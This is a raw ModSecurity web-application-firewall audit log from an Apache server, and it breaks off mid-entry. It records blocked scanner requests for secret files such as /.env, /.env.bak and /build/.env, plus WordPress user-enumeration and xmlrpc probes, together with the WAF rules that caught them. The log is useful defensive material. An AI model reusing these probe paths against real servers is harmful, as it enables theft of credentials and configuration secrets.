close Content-Type: text/html; charset=iso-8859-1 --e7f43768-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746018809974968 726 (- - -) Stopwatch2: 1746018809974968 726; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f43768-Z-- --16838239-A-- [30/Apr/2025:20:28:25 +0700] aBIledmPDA_SdVd56wB_4wAAANY 103.236.140.4 46560 103.236.140.4 8181 --16838239-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Accept-Charset: utf-8 --16838239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16838239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746019705009353 761 (- - -) Stopwatch2: 1746019705009353 761; combined=318, p1=276, p2=0, p3=0, p4=0, p5=41, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16838239-Z-- --33304a59-A-- [30/Apr/2025:21:00:43 +0700] aBItC9mPDA_SdVd56wCb6gAAAMA 103.236.140.4 38484 103.236.140.4 8181 --33304a59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.87.47 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.87.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --33304a59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33304a59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746021643125226 527 (- - -) Stopwatch2: 1746021643125226 527; combined=220, p1=194, p2=0, p3=0, p4=0, p5=26, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33304a59-Z-- --43e63d04-A-- [30/Apr/2025:21:04:51 +0700] aBIuAzsHLQ2TK6eM3erKGgAAAJY 103.236.140.4 51914 103.236.140.4 8181 --43e63d04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --43e63d04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43e63d04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746021891683717 640 (- - -) Stopwatch2: 1746021891683717 640; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43e63d04-Z-- --2ec5f51f-A-- [30/Apr/2025:22:49:46 +0700] aBJGmtmPDA_SdVd56wD4yAAAANg 103.236.140.4 57522 103.236.140.4 8181 --2ec5f51f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ec5f51f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ec5f51f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746028186717470 3210 (- - -) Stopwatch2: 1746028186717470 3210; combined=1802, p1=492, p2=1281, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ec5f51f-Z-- --71469047-A-- [30/Apr/2025:22:49:54 +0700] aBJGoj1td-6YjlnYDRKUKwAAAAs 103.236.140.4 57932 103.236.140.4 8181 --71469047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71469047-C-- demo.sayHello --71469047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71469047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746028194136676 6265 (- - -) Stopwatch2: 1746028194136676 6265; combined=4575, p1=612, p2=3720, p3=31, p4=36, p5=102, sr=118, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71469047-Z-- --5c22870c-A-- [01/May/2025:02:48:20 +0700] aBJ-hDsHLQ2TK6eM3erE6QAAAI4 103.236.140.4 33516 103.236.140.4 8181 --5c22870c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 Accept-Charset: utf-8 --5c22870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c22870c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746042500203042 855 (- - -) Stopwatch2: 1746042500203042 855; combined=388, p1=351, p2=0, p3=0, p4=0, p5=37, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c22870c-Z-- --9a511d48-A-- [01/May/2025:03:12:13 +0700] aBKEHdBN0baiHx4WjiYfNQAAAEg 103.236.140.4 55054 103.236.140.4 8181 --9a511d48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --9a511d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a511d48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746043933462859 627 (- - -) Stopwatch2: 1746043933462859 627; combined=235, p1=206, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a511d48-Z-- --724fd218-A-- [01/May/2025:03:32:05 +0700] aBKIxeVeTgVPHjrSAYCpBwAAAAw 103.236.140.4 53168 103.236.140.4 8181 --724fd218-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.105 Safari/537.36 Vivaldi/2.4.1488.38 Accept-Charset: utf-8 --724fd218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --724fd218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746045125142698 829 (- - -) Stopwatch2: 1746045125142698 829; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --724fd218-Z-- --8f009708-A-- [01/May/2025:04:04:27 +0700] aBKQW-VeTgVPHjrSAYCs2wAAAAg 103.236.140.4 60942 103.236.140.4 8181 --8f009708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8f009708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f009708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746047067126599 882 (- - -) Stopwatch2: 1746047067126599 882; combined=375, p1=337, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f009708-Z-- --b3c83708-A-- [01/May/2025:04:04:28 +0700] aBKQXMVMAgMJpNzaVtJUuwAAAFA 103.236.140.4 60950 103.236.140.4 8181 --b3c83708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b3c83708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3c83708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746047068257946 817 (- - -) Stopwatch2: 1746047068257946 817; combined=330, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3c83708-Z-- --8e135b7d-A-- [01/May/2025:04:55:32 +0700] aBKcVCgtr0Qsi1mFAsO-XwAAAIk 103.236.140.4 50940 103.236.140.4 8181 --8e135b7d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.77.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.77.17 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8e135b7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e135b7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746050132983763 840 (- - -) Stopwatch2: 1746050132983763 840; combined=322, p1=283, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e135b7d-Z-- --59d0b77f-A-- [01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb5wAAAEg 103.236.140.4 60372 103.236.140.4 8181 --59d0b77f-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --59d0b77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59d0b77f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052547129567 791 (- - -) Stopwatch2: 1746052547129567 791; combined=362, p1=326, p2=0, p3=0, p4=0, p5=36, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59d0b77f-Z-- --3b817077-A-- [01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb6QAAAEs 103.236.140.4 60378 103.236.140.4 8181 --3b817077-B-- GET /.env.test HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3b817077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b817077-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052547780401 765 (- - -) Stopwatch2: 1746052547780401 765; combined=298, p1=262, p2=0, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b817077-Z-- --492ada66-A-- [01/May/2025:05:35:48 +0700] aBKlxOVeTgVPHjrSAYCzxQAAAAw 103.236.140.4 60380 103.236.140.4 8181 --492ada66-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --492ada66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --492ada66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052548434919 745 (- - -) Stopwatch2: 1746052548434919 745; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492ada66-Z-- --b5ff8672-A-- [01/May/2025:05:35:49 +0700] aBKlxeVeTgVPHjrSAYCzxgAAAAs 103.236.140.4 60386 103.236.140.4 8181 --b5ff8672-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b5ff8672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ff8672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052549081501 719 (- - -) Stopwatch2: 1746052549081501 719; combined=325, p1=291, p2=0, p3=0, p4=0, p5=33, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ff8672-Z-- --d3d4bd72-A-- [01/May/2025:05:35:49 +0700] aBKlxcVMAgMJpNzaVtJb6wAAAE0 103.236.140.4 60388 103.236.140.4 8181 --d3d4bd72-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --d3d4bd72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3d4bd72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052549729394 709 (- - -) Stopwatch2: 1746052549729394 709; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3d4bd72-Z-- --437c1d79-A-- [01/May/2025:05:35:50 +0700] aBKlxuVeTgVPHjrSAYCzxwAAAAo 103.236.140.4 60394 103.236.140.4 8181 --437c1d79-B-- GET /build/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --437c1d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --437c1d79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052550377082 728 (- - -) Stopwatch2: 1746052550377082 728; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --437c1d79-Z-- --dce33d24-A-- [01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7AAAAE8 103.236.140.4 60400 103.236.140.4 8181 --dce33d24-B-- GET /.env.default HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --dce33d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dce33d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052551032922 794 (- - -) Stopwatch2: 1746052551032922 794; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dce33d24-Z-- --4e763f2e-A-- [01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7gAAAFM 103.236.140.4 60406 103.236.140.4 8181 --4e763f2e-B-- GET /.env.live HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4e763f2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e763f2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052551687480 720 (- - -) Stopwatch2: 1746052551687480 720; combined=276, p1=234, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e763f2e-Z-- --4601d456-A-- [01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzyQAAABA 103.236.140.4 60410 103.236.140.4 8181 --4601d456-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4601d456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4601d456-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 